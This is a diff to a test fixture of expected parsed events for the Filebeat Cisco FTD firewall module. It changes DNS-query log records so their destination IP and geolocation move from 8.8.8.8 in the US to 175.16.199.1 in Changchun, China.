--- a/x-pack/filebeat/module/cisco/ftd/test/dns.log-expected.json
+++ b/x-pack/filebeat/module/cisco/ftd/test/dns.log-expected.json
@@ -16,7 +16,7 @@
 "cisco.ftd.security.dns_query": "elastic.co",
 "cisco.ftd.security.dns_record_type": "a host address",
 "cisco.ftd.security.dns_ttl": "70",
- "cisco.ftd.security.dst_ip": "8.8.8.8",
+ "cisco.ftd.security.dst_ip": "175.16.199.1",
 "cisco.ftd.security.dst_port": "53",
 "cisco.ftd.security.egress_interface": "outside",
 "cisco.ftd.security.egress_zone": "output-zone",
@@ -33,16 +33,17 @@
 "cisco.ftd.security.src_port": "57379",
 "cisco.ftd.security.user": "No Authentication Required",
 "cisco.ftd.source_interface": "inside",
- "destination.address": "8.8.8.8",
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
+ "destination.address": "175.16.199.1",
 "destination.bytes": 145,
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
- "destination.ip": "8.8.8.8",
+ "destination.geo.city_name": "Changchun",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "CN",
+ "destination.geo.country_name": "China",
+ "destination.geo.location.lat": 43.88,
+ "destination.geo.location.lon": 125.3228,
+ "destination.geo.region_iso_code": "CN-22",
+ "destination.geo.region_name": "Jilin Sheng",
+ "destination.ip": "175.16.199.1",
 "destination.packets": 1,
 "destination.port": 53,
 "dns.question.name": "elastic.co",
@@ -58,7 +59,7 @@
 "event.end": "2019-08-26T21:11:03.000-02:00",
 "event.kind": "event",
 "event.module": "cisco",
- "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 57379, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 145, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: a host address, DNS_TTL: 70",
+ "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 57379, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 145, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: a host address, DNS_TTL: 70",
 "event.outcome": "success",
 "event.severity": 1,
 "event.start": "2019-08-26T23:11:03.000Z",
@@ -74,7 +75,7 @@
 "log.level": "alert",
 "log.offset": 0,
 "network.application": "dns client",
- "network.community_id": "1:yuD3M7UhwRSNitDpAnWcqzEC85c=",
+ "network.community_id": "1:Uwfc1VhX0rr+lXXQ8Kiy2934ls0=",
 "network.iana_number": 17,
 "network.protocol": "dns",
 "network.transport": "udp",
@@ -91,7 +92,7 @@
 ],
 "related.ip": [
 "10.0.1.20",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "related.user": [
 "No Authentication Required"
@@ -127,7 +128,7 @@
 "cisco.ftd.security.dns_query": "elastic.co",
 "cisco.ftd.security.dns_record_type": "IP6 Address",
 "cisco.ftd.security.dns_ttl": "299",
- "cisco.ftd.security.dst_ip": "8.8.8.8",
+ "cisco.ftd.security.dst_ip": "175.16.199.1",
 "cisco.ftd.security.dst_port": "53",
 "cisco.ftd.security.egress_interface": "outside",
 "cisco.ftd.security.egress_zone": "output-zone",
@@ -145,16 +146,17 @@
 "cisco.ftd.security.src_port": "51389",
 "cisco.ftd.security.user": "No Authentication Required",
 "cisco.ftd.source_interface": "inside",
- "destination.address": "8.8.8.8",
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
+ "destination.address": "175.16.199.1",
 "destination.bytes": 193,
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
- "destination.ip": "8.8.8.8",
+ "destination.geo.city_name": "Changchun",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "CN",
+ "destination.geo.country_name": "China",
+ "destination.geo.location.lat": 43.88,
+ "destination.geo.location.lon": 125.3228,
+ "destination.geo.region_iso_code": "CN-22",
+ "destination.geo.region_name": "Jilin Sheng",
+ "destination.ip": "175.16.199.1",
 "destination.packets": 1,
 "destination.port": 53,
 "dns.question.name": "elastic.co",
@@ -170,7 +172,7 @@
 "event.end": "2019-08-26T21:11:03.000-02:00",
 "event.kind": "event",
 "event.module": "cisco",
- "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 51389, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299",
+ "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 51389, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299",
 "event.outcome": "success",
 "event.severity": 1,
 "event.start": "2019-08-26T23:11:03.000Z",
@@ -184,9 +186,9 @@
 "host.hostname": "siem-ftd",
 "input.type": "log",
 "log.level": "alert",
- "log.offset": 658,
+ "log.offset": 663,
 "network.application": "dns client",
- "network.community_id": "1:eDcIGG/W1UcwGWzaTgv5mgr2RDw=",
+ "network.community_id": "1:f3leSDycNDPiw2Pu2XLO+oMF4W8=",
 "network.iana_number": 17,
 "network.protocol": "dns",
 "network.transport": "udp",
@@ -203,7 +205,7 @@
 ],
 "related.ip": [
 "10.0.1.20",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "related.user": [
 "No Authentication Required"
@@ -238,7 +240,7 @@
 "cisco.ftd.security.dns_query": "elastic.co",
 "cisco.ftd.security.dns_record_type": "the canonical name for an alias",
 "cisco.ftd.security.dns_ttl": "899",
- "cisco.ftd.security.dst_ip": "8.8.8.8",
+ "cisco.ftd.security.dst_ip": "175.16.199.1",
 "cisco.ftd.security.dst_port": "53",
 "cisco.ftd.security.egress_interface": "outside",
 "cisco.ftd.security.egress_zone": "output-zone",
@@ -255,16 +257,17 @@
 "cisco.ftd.security.src_port": "53033",
 "cisco.ftd.security.user": "No Authentication Required",
 "cisco.ftd.source_interface": "inside",
- "destination.address": "8.8.8.8",
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
+ "destination.address": "175.16.199.1",
 "destination.bytes": 166,
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
- "destination.ip": "8.8.8.8",
+ "destination.geo.city_name": "Changchun",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "CN",
+ "destination.geo.country_name": "China",
+ "destination.geo.location.lat": 43.88,
+ "destination.geo.location.lon": 125.3228,
+ "destination.geo.region_iso_code": "CN-22",
+ "destination.geo.region_name": "Jilin Sheng",
+ "destination.ip": "175.16.199.1",
 "destination.packets": 1,
 "destination.port": 53,
 "dns.question.name": "elastic.co",
@@ -280,7 +283,7 @@
 "event.end": "2019-08-26T21:11:03.000-02:00",
 "event.kind": "event",
 "event.module": "cisco",
- "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899",
+ "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899",
 "event.outcome": "success",
 "event.severity": 1,
 "event.start": "2019-08-26T23:11:03.000Z",
@@ -294,9 +297,9 @@
 "host.hostname": "siem-ftd",
 "input.type": "log",
 "log.level": "alert",
- "log.offset": 1371,
+ "log.offset": 1381,
 "network.application": "dns client",
- "network.community_id": "1:nTPeg7DUgB3rjeFwl+cm5VHEdXQ=",
+ "network.community_id": "1:f+1BLN4exLJYoDCfuD6+el4NNZc=",
 "network.iana_number": 17,
 "network.protocol": "dns",
 "network.transport": "udp",
@@ -313,7 +316,7 @@
 ],
 "related.ip": [
 "10.0.1.20",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "related.user": [
 "No Authentication Required"
@@ -349,7 +352,7 @@
 "cisco.ftd.security.dns_query": "www.elastic.co",
 "cisco.ftd.security.dns_record_type": "a host address",
 "cisco.ftd.security.dns_ttl": "12",
- "cisco.ftd.security.dst_ip": "8.8.8.8",
+ "cisco.ftd.security.dst_ip": "175.16.199.1",
 "cisco.ftd.security.dst_port": "53",
 "cisco.ftd.security.egress_interface": "outside",
 "cisco.ftd.security.egress_zone": "output-zone",
@@ -367,16 +370,17 @@
 "cisco.ftd.security.src_port": "55371",
 "cisco.ftd.security.user": "No Authentication Required",
 "cisco.ftd.source_interface": "inside",
- "destination.address": "8.8.8.8",
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
+ "destination.address": "175.16.199.1",
 "destination.bytes": 200,
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
- "destination.ip": "8.8.8.8",
+ "destination.geo.city_name": "Changchun",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "CN",
+ "destination.geo.country_name": "China",
+ "destination.geo.location.lat": 43.88,
+ "destination.geo.location.lon": 125.3228,
+ "destination.geo.region_iso_code": "CN-22",
+ "destination.geo.region_name": "Jilin Sheng",
+ "destination.ip": "175.16.199.1",
 "destination.packets": 1,
 "destination.port": 53,
 "dns.question.name": "www.elastic.co",
@@ -392,7 +396,7 @@
 "event.end": "2019-08-26T21:11:03.000-02:00",
 "event.kind": "event",
 "event.module": "cisco",
- "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 55371, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 97, ResponderBytes: 200, NAPPolicy: Balanced Security and Connectivity, DNSQuery: www.elastic.co, DNSRecordType: a host address, DNS_TTL: 12",
+ "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 55371, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 97, ResponderBytes: 200, NAPPolicy: Balanced Security and Connectivity, DNSQuery: www.elastic.co, DNSRecordType: a host address, DNS_TTL: 12",
 "event.outcome": "success",
 "event.severity": 1,
 "event.start": "2019-08-26T23:11:03.000Z",
@@ -406,9 +410,9 @@
 "host.hostname": "siem-ftd",
 "input.type": "log",
 "log.level": "alert",
- "log.offset": 2047,
+ "log.offset": 2062,
 "network.application": "dns client",
- "network.community_id": "1:F3IHQYMd3DO1p+rWBITDU1/XCgA=",
+ "network.community_id": "1:BRZXgAyg0sEtB4BCGaSfBuIpTmY=",
 "network.iana_number": 17,
 "network.protocol": "dns",
 "network.transport": "udp",
@@ -425,7 +429,7 @@
 ],
 "related.ip": [
 "10.0.1.20",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "related.user": [
 "No Authentication Required"
@@ -461,7 +465,7 @@
 "cisco.ftd.security.dns_record_type": "IP6 Address",
 "cisco.ftd.security.dns_response_type": "No error",
 "cisco.ftd.security.dns_ttl": "299",
- "cisco.ftd.security.dst_ip": "8.8.8.8",
+ "cisco.ftd.security.dst_ip": "175.16.199.1",
 "cisco.ftd.security.dst_port": "53",
 "cisco.ftd.security.egress_interface": "outside",
 "cisco.ftd.security.egress_zone": "output-zone",
@@ -478,16 +482,17 @@
 "cisco.ftd.security.src_port": "60441",
 "cisco.ftd.security.user": "No Authentication Required",
 "cisco.ftd.source_interface": "inside",
- "destination.address": "8.8.8.8",
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
+ "destination.address": "175.16.199.1",
 "destination.bytes": 193,
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
- "destination.ip": "8.8.8.8",
+ "destination.geo.city_name": "Changchun",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "CN",
+ "destination.geo.country_name": "China",
+ "destination.geo.location.lat": 43.88,
+ "destination.geo.location.lon": 125.3228,
+ "destination.geo.region_iso_code": "CN-22",
+ "destination.geo.region_name": "Jilin Sheng",
+ "destination.ip": "175.16.199.1",
 "destination.packets": 1,
 "destination.port": 53,
 "dns.question.name": "elastic.co",
@@ -503,7 +508,7 @@
 "event.end": "2019-08-26T21:11:03.000-02:00",
 "event.kind": "event",
 "event.module": "cisco",
- "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 60441, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299, DNSResponseType: No error",
+ "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 60441, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299, DNSResponseType: No error",
 "event.outcome": "success",
 "event.severity": 1,
 "event.start": "2019-08-26T23:11:03.000Z",
@@ -517,9 +522,9 @@
 "host.hostname": "siem-ftd",
 "input.type": "log",
 "log.level": "alert",
- "log.offset": 2766,
+ "log.offset": 2786,
 "network.application": "dns client",
- "network.community_id": "1:1SqTqSDG5492OiLhDUMOi+wnDYs=",
+ "network.community_id": "1:TPjownqp6q96Ph6ZPCNuoX0B3HM=",
 "network.iana_number": 17,
 "network.protocol": "dns",
 "network.transport": "udp",
@@ -536,7 +541,7 @@
 ],
 "related.ip": [
 "10.0.1.20",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "related.user": [
 "No Authentication Required"
@@ -571,7 +576,7 @@
 "cisco.ftd.security.dns_query": "elastic.co",
 "cisco.ftd.security.dns_record_type": "the canonical name for an alias",
 "cisco.ftd.security.dns_ttl": "658",
- "cisco.ftd.security.dst_ip": "8.8.8.8",
+ "cisco.ftd.security.dst_ip": "175.16.199.1",
 "cisco.ftd.security.dst_port": "53",
 "cisco.ftd.security.egress_interface": "outside",
 "cisco.ftd.security.egress_zone": "output-zone",
@@ -588,16 +593,17 @@
 "cisco.ftd.security.src_port": "59714",
 "cisco.ftd.security.user": "No Authentication Required",
 "cisco.ftd.source_interface": "inside",
- "destination.address": "8.8.8.8",
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
+ "destination.address": "175.16.199.1",
 "destination.bytes": 166,
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
- "destination.ip": "8.8.8.8",
+ "destination.geo.city_name": "Changchun",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "CN",
+ "destination.geo.country_name": "China",
+ "destination.geo.location.lat": 43.88,
+ "destination.geo.location.lon": 125.3228,
+ "destination.geo.region_iso_code": "CN-22",
+ "destination.geo.region_name": "Jilin Sheng",
+ "destination.ip": "175.16.199.1",
 "destination.packets": 1,
 "destination.port": 53,
 "dns.question.name": "elastic.co",
@@ -613,7 +619,7 @@
 "event.end": "2019-08-26T21:11:03.000-02:00",
 "event.kind": "event",
 "event.module": "cisco",
- "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 59714, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 658",
+ "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 59714, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 658",
 "event.outcome": "success",
 "event.severity": 1,
 "event.start": "2019-08-26T23:11:03.000Z",
@@ -627,9 +633,9 @@
 "host.hostname": "siem-ftd",
 "input.type": "log",
 "log.level": "alert",
- "log.offset": 3449,
+ "log.offset": 3474,
 "network.application": "dns client",
- "network.community_id": "1:eXdHUOdHk5dGXusvMEGcWj9ywPM=",
+ "network.community_id": "1:Zs97Yt3odnRGMC6czVZHiK2gaFs=",
 "network.iana_number": 17,
 "network.protocol": "dns",
 "network.transport": "udp",
@@ -646,7 +652,7 @@
 ],
 "related.ip": [
 "10.0.1.20",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "related.user": [
 "No Authentication Required"
@@ -683,7 +689,7 @@
 "cisco.ftd.security.dns_record_type": "mail exchange",
 "cisco.ftd.security.dns_response_type": "Non-Existent Domain",
 "cisco.ftd.security.dns_ttl": "299",
- "cisco.ftd.security.dst_ip": "8.8.8.8",
+ "cisco.ftd.security.dst_ip": "175.16.199.1",
 "cisco.ftd.security.dst_port": "53",
 "cisco.ftd.security.egress_interface": "outside",
 "cisco.ftd.security.egress_zone": "output-zone",
@@ -701,16 +707,17 @@
 "cisco.ftd.security.src_port": "55105",
 "cisco.ftd.security.user": "No Authentication Required",
 "cisco.ftd.source_interface": "inside",
- "destination.address": "8.8.8.8",
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
+ "destination.address": "175.16.199.1",
 "destination.bytes": 199,
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
- "destination.ip": "8.8.8.8",
+ "destination.geo.city_name": "Changchun",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "CN",
+ "destination.geo.country_name": "China",
+ "destination.geo.location.lat": 43.88,
+ "destination.geo.location.lon": 125.3228,
+ "destination.geo.region_iso_code": "CN-22",
+ "destination.geo.region_name": "Jilin Sheng",
+ "destination.ip": "175.16.199.1",
 "destination.packets": 1,
 "destination.port": 53,
 "dns.question.name": "elastic.co",
@@ -726,7 +733,7 @@
 "event.end": "2019-08-26T21:11:03.000-02:00",
 "event.kind": "event",
 "event.module": "cisco",
- "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Non-Existent Domain, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299",
+ "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Non-Existent Domain, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299",
 "event.outcome": "success",
 "event.severity": 1,
 "event.start": "2019-08-26T23:11:03.000Z",
@@ -740,9 +747,9 @@
 "host.hostname": "siem-ftd",
 "input.type": "log",
 "log.level": "alert",
- "log.offset": 4125,
+ "log.offset": 4155,
 "network.application": "dns client",
- "network.community_id": "1:rjxS8IH4jqdHiflcG+1txqEFP1M=",
+ "network.community_id": "1:udDTvAepVn3p8B+5mKdI4G/Ijb0=",
 "network.iana_number": 17,
 "network.protocol": "dns",
 "network.transport": "udp",
@@ -759,7 +766,7 @@
 ],
 "related.ip": [
 "10.0.1.20",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "related.user": [
 "No Authentication Required"
@@ -794,7 +801,7 @@
 "cisco.ftd.security.dns_query": "elastic.co",
 "cisco.ftd.security.dns_record_type": "an authoritative name server",
 "cisco.ftd.security.dns_ttl": "21599",
- "cisco.ftd.security.dst_ip": "8.8.8.8",
+ "cisco.ftd.security.dst_ip": "175.16.199.1",
 "cisco.ftd.security.dst_port": "53",
 "cisco.ftd.security.egress_interface": "outside",
 "cisco.ftd.security.egress_zone": "output-zone",
@@ -811,16 +818,17 @@
 "cisco.ftd.security.src_port": "57141",
 "cisco.ftd.security.user": "No Authentication Required",
 "cisco.ftd.source_interface": "inside",
- "destination.address": "8.8.8.8",
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
+ "destination.address": "175.16.199.1",
 "destination.bytes": 221,
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
- "destination.ip": "8.8.8.8",
+ "destination.geo.city_name": "Changchun",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "CN",
+ "destination.geo.country_name": "China",
+ "destination.geo.location.lat": 43.88,
+ "destination.geo.location.lon": 125.3228,
+ "destination.geo.region_iso_code": "CN-22",
+ "destination.geo.region_name": "Jilin Sheng",
+ "destination.ip": "175.16.199.1",
 "destination.packets": 1,
 "destination.port": 53,
 "dns.question.name": "elastic.co",
@@ -836,7 +844,7 @@
 "event.end": "2019-08-26T21:11:03.000-02:00",
 "event.kind": "event",
 "event.module": "cisco",
- "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599",
+ "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599",
 "event.outcome": "success",
 "event.severity": 1,
 "event.start": "2019-08-26T23:11:03.000Z",
@@ -850,9 +858,9 @@
 "host.hostname": "siem-ftd",
 "input.type": "log",
 "log.level": "alert",
- "log.offset": 4878,
+ "log.offset": 4913,
 "network.application": "dns client",
- "network.community_id": "1:R1FcZHFFvO0mHFfeVXH/CwTGCmU=",
+ "network.community_id": "1:lQqpyFbf8OB4k/v/Xp3qTDb5NiQ=",
 "network.iana_number": 17,
 "network.protocol": "dns",
 "network.transport": "udp",
@@ -869,7 +877,7 @@
 ],
 "related.ip": [
 "10.0.1.20",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "related.user": [
 "No Authentication Required"
@@ -905,7 +913,7 @@
 "cisco.ftd.security.dns_record_type": "marks the start of a zone of authority",
 "cisco.ftd.security.dns_response_type": "Server Failure",
 "cisco.ftd.security.dns_ttl": "899",
- "cisco.ftd.security.dst_ip": "8.8.8.8",
+ "cisco.ftd.security.dst_ip": "175.16.199.1",
 "cisco.ftd.security.dst_port": "53",
 "cisco.ftd.security.egress_interface": "outside",
 "cisco.ftd.security.egress_zone": "output-zone",
@@ -922,16 +930,17 @@
 "cisco.ftd.security.src_port": "47260",
 "cisco.ftd.security.user": "No Authentication Required",
 "cisco.ftd.source_interface": "inside",
- "destination.address": "8.8.8.8",
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
+ "destination.address": "175.16.199.1",
 "destination.bytes": 166,
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
